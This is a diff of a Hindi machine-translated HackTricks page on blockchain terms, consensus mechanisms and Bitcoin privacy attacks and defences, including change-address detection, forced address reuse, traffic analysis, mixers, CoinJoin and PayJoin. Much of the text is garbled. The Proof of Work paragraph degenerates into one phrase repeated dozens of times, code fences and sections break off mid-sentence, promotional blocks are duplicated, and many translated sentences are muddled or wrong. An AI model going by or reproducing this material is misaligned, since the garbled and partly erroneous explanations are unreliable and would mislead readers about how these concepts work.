{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks swag प्राप्त करें**](https://peass.creator-spring.com)
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,150 +1,143 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापन दिखाए जाए** या **HackTricks को PDF में डाउनलोड** करें तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, **The PEASS Family** की खोज करें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PRs सबमिट करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# मूलभूत शब्दावली
|
||||
## मूल अवधारणाएँ
|
||||
|
||||
* **स्मार्ट कॉन्ट्रैक्ट**: स्मार्ट कॉन्ट्रैक्ट्स बेसिकली **ब्लॉकचेन पर स्टोर किए गए प्रोग्राम हैं जो निश्चित स्थितियों को पूरा होने पर चलते हैं**। वे सामान्यत: **एक समझौते** के **क्रियान्वयन** को स्वचालित करने के लिए उपयोग किए जाते हैं ताकि सभी सहभागियों को परिणाम के बारे में तुरंत पता चल सके, किसी मध्यस्थ की सहायता या समय की हानि के बिना। (से [यहाँ](https://www.ibm.com/topics/smart-contracts)).
|
||||
* मूल रूप से, एक स्मार्ट कॉन्ट्रैक्ट एक **कोड का टुकड़ा** है जो लोग जब उन्हें अनुबंध तक पहुंचते हैं तो क्रियान्वित होगा। स्मार्ट कॉन्ट्रैक्ट्स **ब्लॉकचेन में चलते हैं** (इसलिए परिणाम स्थायी रूप से स्टोर होते हैं) और लोग उन्हें स्वीकार करने से पहले पढ़ सकते हैं।
|
||||
* **डीएपी**: **डेसेंट्रलाइज्ड एप्लिकेशन** स्मार्ट कॉन्ट्रैक्ट्स के ऊपर लागू होते हैं। उनके पास एक फ्रंट-एंड होता है जहां उपयोगकर्ता एप्लिकेशन के साथ बातचीत कर सकते हैं, **बैक-एंड** सार्वजनिक होता है (ताकि इसे मूल्यांकन किया जा सके) और एक **स्मार्ट कॉन्ट्रैक्ट** के रूप में लागू किया जाता है। कभी-कभी डेटाबेस का उपयोग आवश्यक होता है, एथेरियम ब्लॉकचेन हर खाते को निश्चित संग्रह आवंटित करता है।
|
||||
* **टोकन और सिक्के**: एक **सिक्का** एक क्रिप्टोकरेंसी है जो **डिजिटल** **पैसे** के रूप में काम करता है और एक **टोकन** कुछ **मूल्य** का प्रतिनिधित्व करता है लेकिन यह एक सिक्का नहीं है।
|
||||
* **यूटिलिटी टोकन्स**: ये टोकन उपयोगकर्ता को **बाद में कुछ सेवा तक पहुंचने** की अनुमति देते हैं (यह किसी विशिष्ट वातावरण में कुछ मूल्य वाली चीज है)।
|
||||
* **सुरक्षा टोकन्स**: ये **स्वामित्व** या किसी संपत्ति का प्रतिनिधित्व करते हैं।
|
||||
* **डीफाई**: **डेसेंट्रलाइज्ड फाइनेंस**।
|
||||
* **डीईएक्स: डेसेंट्रलाइज्ड एक्सचेंज प्लेटफॉर्म्स**।
|
||||
* **डीएओएस**: **डेसेंट्रलाइज्ड ऑटोनोमस ऑर्गनाइजेशन्स**।
|
||||
- **स्मार्ट कॉन्ट्रैक्ट्स** को उन कार्यक्रमों के रूप में परिभाषित किया जाता है जो ब्लॉकचेन पर कार्रवाई करते हैं जब कुछ शर्तें पूरी होती हैं, बिचौलियों के बिना समझौते की कार्रवाई को स्वचालित करना।
|
||||
- **डीसेंट्रलाइज्ड एप्लिकेशन्स (dApps)** स्मार्ट कॉन्ट्रैक्ट्स पर आधारित होते हैं, जिनमें एक उपयोगकर्ता-मित्रपूर्ण फ्रंट-एंड और एक पारदर्शी, जांचने योग्य बैक-एंड होता है।
|
||||
- **टोकन और सिक्के** अंतर करते हैं जहां सिक्के डिजिटल धन के रूप में काम करते हैं, जबकि टोकन विशेष संदर्भों में मूल्य या स्वामित्व को दर्शाते हैं।
|
||||
- **यूटिलिटी टोकन्स** सेवाओं तक पहुंचने की अनुमति देते हैं, और **सिक्योरिटी टोकन्स** संपत्ति के स्वामित्व को दर्शाते हैं।
|
||||
- **डीफाई** का मतलब है डीसेंट्रलाइज्ड फाइनेंस, जो केंद्रीय प्राधिकरणों के बिना वित्तीय सेवाएं प्रदान करता है।
|
||||
- **डीईएक्स** और **डीएओएस** डीसेंट्रलाइज्ड एक्सचेंज प्लेटफॉर्म और डीसेंट्रलाइज्ड ऑटोनोमस ऑर्गनाइजेशन्स को संदर्भित करते हैं।
|
||||
|
||||
# सहमति तंत्र
|
||||
## सहमति तंत्र
|
||||
|
||||
एक ब्लॉकचेन लेनदारी को मान्य करने के लिए, इसे **ब्लॉकचेन** में **जोड़ना** होगा। मान्यकर्ता (खान संचालक) इस जोड़ने का कार्य करते हैं; अधिकांश प्रोटोकॉल में, वे इसे करने के लिए **पुरस्कार प्राप्त** करते हैं। ब्लॉकचेन को सुरक्षित रखने के लिए, इसे **एक दुर्भाग्यपूर्ण उपयोगकर्ता या समूह से बड़ी संख्या में मान्यता प्राप्त करने से रोकने का एक तंत्र होना चाहिए**।
|
||||
सहमति तंत्र सुनिश्चित करते हैं और ब्लॉकचेन पर सुरक्षित और स्वीकृत लेन-देन की पुष्टि करते हैं:
|
||||
- **प्रूफ ऑफ वर्क (PoW)** लेन-देन सत्यापन के लिए कंप्यूटेशनल पावर पर निर्भर होता है।
|
||||
- **प्रूफ ऑफ स्टेक (PoS)** वैधकों से निश्चित मात्रा में टोकन रखने की मांग करता है, जो PoW की तुलना में ऊर्जा खपत को कम करता है।
|
||||
|
||||
प्रूफ ऑफ वर्क, एक और सामान्यत: उपयोग किया जाने वाला सहमति तंत्र, सौजन्य की मान्यता की जांच के लिए गणना क्षमता की मान्यता का उपयोग करता है, जिसमें एक संभावित हमलावर को वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वै
|
||||
```
|
||||
## बिटकॉइन महत्वपूर्ण अंश
|
||||
|
||||
### लेन-देन
|
||||
|
||||
बिटकॉइन लेन-देन में प्रायोजित धन के बीच फंड ले जाने की शामिल होती है। लेन-देन डिजिटल हस्ताक्षरों के माध्यम से सत्यापित की जाती है, सुनिश्चित करती है कि केवल निजी कुंजी के मालिक ही स्थानांतरण प्रारंभ कर सकता है।
|
||||
|
||||
#### मुख्य घटक:
|
||||
|
||||
- **मल्टीसाइनेचर लेन-देन** को एक लेन-देन की अधिक संकेतन की आवश्यकता होती है। लेन-देन में **इनपुट्स** (फंड का स्रोत), **आउटपुट्स** (गंतव्य), **शुल्क** (खनिजों को दिया जाता है), और **स्क्रिप्ट्स** (लेन-देन नियम) शामिल होते हैं।
|
||||
|
||||
### लाइटनिंग नेटवर्क
|
||||
|
||||
बिटकॉइन की स्कैलेबिलिटी को बढ़ाने का उद्देश्य एक चैनल के भीतर एकाधिक लेन-देन की अनुमति देना है, केवल अंतिम स्थिति को ब्लॉकचेन पर प्रसारित करने के लिए।
|
||||
|
||||
## बिटकॉइन गोपनीयता चिंताएँ
|
||||
|
||||
गोपनीयता हमले, जैसे कि **सामान्य इनपुट स्वामित्व** और **यूटीएक्सओ चेंज एड्रेस डिटेक्शन**, लेन-देन पैटर्न का शोषण करते हैं। **मिक्सर्स** और **कॉइनजॉइन** जैसी रणनीतियाँ उपयोगकर्ताओं के बीच लेन-देन के लिंक को अस्पष्ट करके गोपनीयता को बेहतर बनाती हैं।
|
||||
|
||||
## बिटकॉइन गोपनीयता हमले
|
||||
|
||||
# बिटकॉइन गोपनीयता हमलों का सारांश
|
||||
|
||||
बिटकॉइन के विश्व में, लेन-देनों की गोपनीयता और उपयोगकर्ताओं की गुमनामी अक्सर चिंता के विषय होते हैं। यहाँ कुछ सामान्य विधियाँ हैं जिनके माध्यम से हमलावर बिटकॉइन गोपनीयता को कमजोर कर सकते हैं।
|
||||
|
||||
## **सामान्य इनपुट स्वामित्व मान्यता**
|
||||
|
||||
सामान्य रूप से विभिन्न उपयोगकर्ताओं के इनपुट एक ही लेन-देन में मिलाए जाने की कठिनाई के कारण, **एक ही लेन-देन में दो इनपुट पते अक्सर एक ही मालिक के होने का माना जाता है**।
|
||||
|
||||
## **यूटीएक्सओ चेंज एड्रेस डिटेक्शन**
|
||||
|
||||
एक यूटीएक्सओ, या **अनस्पेंट ट्रांजैक्शन आउटपुट**, को एक लेन-देन में पूरी तरह से खर्च किया जाना चाहिए। अगर इसमें से केवल एक हिस्सा किसी अन्य पते पर भेजा जाता है, तो शेष नये चेंज एड्रेस पर जाता है। दर्शक इस नए पते को भेजने वाले का मानते हैं, जिससे गोपनीयता को खतरे में डाला जाता है।
|
||||
|
||||
### उदाहरण
|
||||
```bash
|
||||
2 btc --> 4 btc
|
||||
3 btc 1 btc
|
||||
```
|
||||
मानते हैं कि उत्पादों में से एक चेंज है और दूसरा उत्पाद भुगतान है। दो व्याख्यान हैं: भुगतान उत्पाद या 4 BTC उत्पाद है या 1 BTC उत्पाद है। लेकिन अगर 1 BTC उत्पाद भुगतान राशि है तो 3 BTC इनपुट अनावश्यक है, क्योंकि वॉलेट केवल 2 BTC इनपुट खर्च कर सकती थी और इसे करने के लिए कम माइनर शुल्क भुगत सकती थी। यह एक संकेत है कि वास्तविक भुगतान उत्पाद 4 BTC है और 1 BTC चेंज उत्पाद है।
|
||||
## **बाध्य पता पुनः उपयोग**
|
||||
|
||||
यह वह समस्या है जिसके लिए लेनदार अधिक से अधिक इनपुट होते हैं। इस लीक को ठीक करने का एक तरीका यह है कि चेंज उत्पाद किसी भी इनपुट से अधिक होने तक अधिक इनपुट जोड़ें, उदाहरण के लिए:
|
||||
```
|
||||
2 btc --> 4 btc
|
||||
3 btc 6 btc
|
||||
5 btc
|
||||
```
|
||||
## मजबूर पता पुनरउपयोग
|
||||
हमलावार छोटी राशि पहले से उपयोग किए गए पतों पर भेज सकते हैं, आशा है कि प्राप्तकर्ता भविष्य की लेन-देन में इन्हें अन्य इनपुट के साथ मिला देता है, जिससे पते को एक साथ जोड़ा जा सकता है।
|
||||
|
||||
**मजबूर पता पुनरउपयोग** या **प्रोत्साहित पता पुनरउपयोग** एक प्रकार की है जब एक प्रतिकूल व्यक्ति ब्लॉक श्रृंखला पर पहले से ही उपयोग किए गए पतों को बिटकॉइन की एक (अक्सर छोटी) राशि देता है। दुश्मन उम्मीद करता है कि उपयोगकर्ता या उनका वॉलेट सॉफ्टवेयर **भुगतान को एक बड़े लेन-देन के लिए इनपुट के रूप में उपयोग करेगा जिससे सामान्य-इनपुट-स्वामित्व** नियमानुसार अन्य पतों को प्रकट करेगा। ये भुगतान अप्रत्याशित पता पुनरउपयोग में पता मालिक को मनोबलित पता पुनरउपयोग के रूप में समझा जा सकता है।
|
||||
### सही वॉलेट व्यवहार
|
||||
इस गोपनीयता लीक को रोकने के लिए वॉलेट को खाली पतों पर प्राप्त किए गए सिक्कों का उपयोग न करना चाहिए।
|
||||
|
||||
यह हमला कभी-कभी गलती से **धूल अटैक** कहलाता है।
|
||||
## **अन्य ब्लॉकचेन विश्लेषण तकनीकें**
|
||||
|
||||
वॉलेट्स द्वारा सही व्यवहार यह है कि खाली पतों पर जमी मुद्रा को खर्च न करें।
|
||||
- **सटीक भुगतान राशियाँ:** परिवर्तन के बिना लेन-देन संभावित रूप से एक ही उपयोगकर्ता द्वारा स्वामित्व में होती हैं।
|
||||
- **गोल नंबर:** एक लेन-देन में गोल नंबर एक भुगतान का सुझाव देता है, जिसमें गोल आउटपुट संभावित रूप से परिवर्तन होता है।
|
||||
- **वॉलेट फिंगरप्रिंटिंग:** विभिन्न वॉलेट्स के अद्वितीय लेन-देन निर्माण पैटर्न होते हैं, जो विश्लेषकों को सॉफ़्टवेयर का पहचान करने और संभावित रूप से परिवर्तन पता करने की अनुमति देते हैं।
|
||||
- **राशि और समय संबंध:** लेन-देन के समय या राशियों का खुलासा करना लेन-देन को ट्रेसेबल बना सकता है।
|
||||
|
||||
## अन्य ब्लॉकचेन विश्लेषण
|
||||
## **ट्रैफिक विश्लेषण**
|
||||
|
||||
* **सटीक भुगतान राशियाँ**: परिवर्तन के साथ लेन-देन से बचने के लिए, भुगतान को UTXO के बराबर होना चाहिए (जो अत्यधिक अपेक्षित है)। इसलिए, एक **भुगतान जिसमें कोई परिवर्तन पता नहीं है, संभावित रूप से एक ही उपयोगकर्ता के 2 पतों के बीच स्थानांतरण है**।
|
||||
* **गोल नंबर**: एक लेन-देन में, यदि आउटपुट में से एक "**गोल नंबर**" है, तो यह उचित है कि यह एक **इंसान को भुगतान करने के लिए जो उसने वह** "गोल नंबर" **मूल्य** डाला है, इसलिए अन्य हिस्सा बचा होना चाहिए।
|
||||
* **वॉलेट फिंगरप्रिंटिंग:** एक सावधान विश्लेषक कभी-कभी यह निर्धारित कर सकता है कि कौन सा सॉफ्टवेयर किस लेन-देन को बनाया, क्योंकि **कई विभिन्न वॉलेट सॉफ्टवेयर हमेशा बिल्कुल एक ही तरीके से लेन-देन नहीं करते**। वॉलेट फिंगरप्रिंटिंग का उपयोग परिवर्तन आउटपुट का पता लगाने के लिए किया जा सकता है क्योंकि एक परिवर्तन आउटपुट वह है जिसे एक ही वॉलेट फिंगरप्रिंट के साथ खर्च किया गया है।
|
||||
* **राशि और समय संबंध**: यदि व्यक्ति जिसने लेन-देन किया है **समय** और/या **राशि** का खुलासा करता है, तो इसे आसानी से **खोजा जा सकता है**।
|
||||
नेटवर्क ट्रैफिक का मॉनिटरिंग करके हमलावर लेन-देन या ब्लॉक को आईपी पतों से जोड़ सकते हैं, उपयोगकर्ता गोपनीयता को कमजोर करते हैं। यह विशेष रूप से सत्य है अगर कोई संस्था कई बिटकॉइन नोड चलाती है, जिससे उनकी लेन-देन की मॉनिटरिंग क्षमता बढ़ जाती है।
|
||||
|
||||
## ट्रैफिक विश्लेषण
|
||||
|
||||
कुछ संगठन **आपके ट्रैफिक को स्निफ करते** हुए आपको बिटकॉइन नेटवर्क में संचार करते हुए देख सकते हैं।\
|
||||
यदि प्रतिकूल एक लेन-देन या ब्लॉक देखता है **जो आपके नोड से निकल रहा है जिससे पहले नहीं आया था**, तो यह निश्चितता के साथ जान सकता है कि **लेन-देन आपके द्वारा किया गया था या ब्लॉक आपके द्वारा खनित हुआ था**। इंटरनेट कनेक्शन शामिल होने के कारण, प्रतिकूल व्यक्ति को खोजने में सक्षम होगा कि खोजे गए बिटकॉइन सूचना के साथ IP पता को जोड़ सकता है।
|
||||
|
||||
एक हमलावर जो सभी इंटरनेट ट्रैफिक को स्निफ नहीं कर सकता है लेकिन जिसके पास **बहुत सारे बिटकॉइन नोड** होते हैं ताकि वह **स्रोतों के करीब रह सके**, वह जान सकता है कि कौन से IP पते लेन-देन या ब्लॉक की घोषणा कर रहे हैं।\
|
||||
इसके अलावा, कुछ वॉलेट समय-समय पर अपुष्ट लेन-देन को फिर से प्रसारित करते हैं ताकि वे नेटवर्क में व्यापक रूप से प्रसारित होने और खनित होने की अधिक संभावना हो।
|
||||
|
||||
## पतों के मालिक के बारे में जानकारी प्राप्त करने के लिए अन्य हमले
|
||||
|
||||
अधिक हमलों के लिए पढ़ें [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy)
|
||||
|
||||
# अनाम बिटकॉइन
|
||||
|
||||
## बिटकॉइन गुमनामता से प्राप्त करना
|
||||
|
||||
* **नकद व्यापार:** नकद का उपयोग करके बिटकॉइन खरीदें।
|
||||
* **नकद के समर्थक:** गिफ्ट कार्ड या समान क्रय करें और उन्हें ऑनलाइन बिटकॉइन के लिए विनिमय करें।
|
||||
* **खनन:** खनन बिटकॉइन प्राप्त करने का सबसे गुमनाम तरीका है। यह सोलो-खनन के लिए लागू है क्योंकि [खनन पूल](https://en.bitcoin.it/wiki/Pooled\_mining) आम तौर पर हैशर का IP पता जानते हैं।
|
||||
* **चोरी:** सिद्धांत में एक और गुमनाम तरीका बिटकॉइन प्राप्त करने का यह है कि उन्हें चुराया जाए।
|
||||
|
||||
## मिक्सर
|
||||
|
||||
एक उपयोगकर्ता **मिक्सिंग सेवा को बिटकॉइन भेजेगा** और सेवा **उपयोगकर्ता को विभिन्न बिटकॉइन वापस भेजेगी**, एक शुल्क कम करके। सिद्धांत में, ब्लॉकचेन को अवलोकन करने वाला दुश्मन **आने वाले और जाने वाले लेन-देन को जोड़ने में असमर्थ होगा**।
|
||||
|
||||
हालांकि, उपयोगकर्ता को मिक्सिंग सेवा पर भरोसा करना होगा कि वह बिटकॉइन वापस करेगी और यह भी नहीं रिकॉर्ड सहेज रही है कि पैसे प्राप्त और भेजे गए धन के बीच संबंधों के बारे में।\
|
||||
कुछ अन्य सेवाएं भी मिक्सर के रूप में उपयोग की जा सकती हैं, जैसे बिटकॉइन कैसीनो जहां आप बिटकॉइन भेज सकते हैं और बाद में उन्हें पुनः प्राप्त कर सकते हैं।
|
||||
|
||||
## कॉइनजॉइन
|
||||
|
||||
**कॉइनजॉइन** एक उपयोगकर्ताओं के कई लेन-देन को केवल एक में मिलाएगा ताकि एक अवलोकक को पता लगाना अधिक **कठिन** हो जिस इनपुट किस आउटपुट से संबंधित है।\
|
||||
यह एक नई स्तर की गोपनीयता प्रदान करता है, हालांकि, **कुछ** **लेन-देन** जहां कुछ इनपुट और आउटपुट राशियाँ संबंधित हैं या बाकी इनपुट और आउटपुट से बहुत अलग हैं **बाहरी अवलोकक द्वारा संबंधित हो सकते हैं**।
|
||||
|
||||
बिटकॉइन की ब्लॉकचेन पर (संभावित) कॉइनजॉइन लेन-देन आईडी के उदाहरण हैं `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` और `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`।
|
||||
|
||||
[**https://coinjoin.io/en**](https://coinjoin.io/en)\
|
||||
**कॉइनजॉइन के लिए समान लेकिन बेहतर और एथीरियम के लिए आपके पास** [**ट
|
||||
```
|
||||
## अधिक
|
||||
गोपनीयता हमलों और रक्षाओं की व्यापक सूची के लिए [बिटकॉइन गोपनीयता पर बिटकॉइन विकि](https://en.bitcoin.it/wiki/Privacy) पर जाएं।
|
||||
```plaintext
|
||||
2 btc --> 3 btc
|
||||
5 btc 4 btc
|
||||
```
|
||||
# बिटकॉइन गोपनीयता अच्छी प्रथाएं
|
||||
Transactions जैसे ऊपर कर सकते हैं PayJoin, गोपनीयता को बढ़ावा देते हुए सामान्य बिटकॉइन लेन-देन से असंवेदनशील रह सकते हैं।
|
||||
|
||||
## वॉलेट समक्रमण
|
||||
**PayJoin का उपयोग पारंपरिक निगरानी विधियों को काफी व्यवधान कर सकता है**, यह लेन-देनीय गोपनीयता की पुरस्कृति में एक आशाजनक विकास है।
|
||||
|
||||
बिटकॉइन वॉलेट को अपने शेष और इतिहास के बारे में जानकारी कैसे प्राप्त करनी चाहिए। देर से 2018 के अनुसार सबसे व्यावहारिक और निजी मौजूदा समाधान हैं एक **पूर्ण नोड वॉलेट** (जो अधिकतम निजी है) और **क्लाइंट-साइड ब्लॉक फ़िल्टरिंग** (जो बहुत अच्छा है)।
|
||||
# क्रिप्टोकरेंसी में गोपनीयता के लिए सर्वोत्तम प्रथाएं
|
||||
|
||||
* **पूर्ण नोड:** पूर्ण नोड पूरे ब्लॉकचेन को डाउनलोड करते हैं जिसमें बिटकॉइन में हुए हर ऑन-चेन [लेन-देन](https://en.bitcoin.it/wiki/Transaction) शामिल है। इसलिए एक प्रतिकूल उपयोगकर्ता की इंटरनेट कनेक्शन को देख रहे शत्रु को यह पता नहीं चलेगा कि उपयोगकर्ता किस लेन-देन या पतों में रुचि रखता है।
|
||||
* **क्लाइंट-साइड ब्लॉक फ़िल्टरिंग:** क्लाइंट-साइड ब्लॉक फ़िल्टरिंग काम करता है जिसमें **फ़िल्टर** बनाए जाते हैं जो ब्लॉक में हर लेन-देन के सभी **पते** को शामिल करते हैं। फ़िल्टर यह जांच सकते हैं कि क्या कोई **तत्व सेट में है**; गलत पॉजिटिव्स संभव हैं लेकिन गलत नेगेटिव्स नहीं। एक हल्का वॉलेट सभी ब्लॉक में अपने **पतों** के साथ मेल खाता है और इसके **पास** **पते** के मिलान की जांच करता है। मिलान वाले निर्देशिका से वह ब्लॉक पूरे डाउनलोड करेगा, और उन ब्लॉक का उपयोग वॉलेट के इतिहास और वर्तमान शेष को प्राप्त करने के लिए किया जाएगा।
|
||||
## **वॉलेट समक्रमण तकनीकें**
|
||||
|
||||
## टॉर
|
||||
गोपनीयता और सुरक्षा बनाए रखने के लिए वॉलेट को ब्लॉकचेन के साथ समक्रमित करना महत्वपूर्ण है। दो विधियाँ उभरती हैं:
|
||||
|
||||
बिटकॉइन नेटवर्क एक पीर-टू-पीर नेटवर्क का उपयोग करता है, जिसका मतलब है कि अन्य पीयर आपका आईपी पता सीख सकते हैं। इसलिए यह सिफारिश की जाती है कि आप **बिटकॉइन नेटवर्क के साथ संवाद करना चाहते हैं तो हर बार टॉर के माध्यम से कनेक्ट करें**।
|
||||
- **पूर्ण नोड**: पूर्ण नोड द्वारा पूरे ब्लॉकचेन को डाउनलोड करके, एक पूर्ण नोड गोपनीयता को अधिकतम सुनिश्चित करता है। सभी किए गए लेन-देन स्थानीय रूप से संग्रहीत होते हैं, जिससे प्रतिकूलकों को पहचानना असंभव हो जाता है कि उपयोगकर्ता किस लेन-देन या पतों में रुचि रखता है।
|
||||
- **क्लाइंट-साइड ब्लॉक फ़िल्टरिंग**: यह विधि हर ब्लॉक के लिए फ़िल्टर बनाने का सम्मिलित करती है, जिससे वॉलेट नेटवर्क अवलोककर्ताओं को विशेष रुचियों को प्रकट किए बिना संबंधित लेन-देनों की पहचान कर सकते हैं। हल्के वॉलेट इन फ़िल्टर्स को डाउनलोड करते हैं, केवल जब उपयोगकर्ता के पतों के साथ मेल खाता है तो पूरे ब्लॉक्स को लाते हैं।
|
||||
|
||||
## पते का पुनः उपयोग न करना
|
||||
## **गुप्तचरता के लिए Tor का उपयोग**
|
||||
|
||||
**पतों का अधिक से अधिक एक बार से अधिक उपयोग करना गोपनीयता के लिए बहुत हानिकारक है क्योंकि यह अधिक ब्लॉकचेन लेन-देन को जोड़ता है जिसमें यह साबित होता है कि वे एक ही एकाइ द्वारा बनाए गए थे**। बिटकॉइन का सबसे निजी और सुरक्षित तरीका यह है कि जो व्यक्ति आपको भुगतान करता है, उसे प्रत्येक व्यक्ति को एक नया पता भेजा जाए। प्राप्त किए गए सिक्के खर्च कर दिए जाने के बाद पता कभी भी फिर से उपयोग नहीं किया जाना चाहिए। साथ ही, जब बिटकॉइन भेजा जाए तो एक नया बिटकॉइन पता मांगा जाना चाहिए। सभी अच्छे बिटकॉइन वॉलेट में उपयोगकर्ता इंटरफेस होता है जो पते का पुनः उपयोग न करने की सलाह देता है।
|
||||
बिटकॉइन पीयर-टू-पीयर नेटवर्क पर काम करते हुए, Tor का उपयोग आपके आईपी पते को मास्क करने के लिए सिफारिश किया जाता है, जो नेटवर्क के साथ बातचीत करते समय गोपनीयता को बढ़ावा देता है।
|
||||
|
||||
## एकाधिक लेन-देन
|
||||
## **पते का पुनः उपयोग रोकना**
|
||||
|
||||
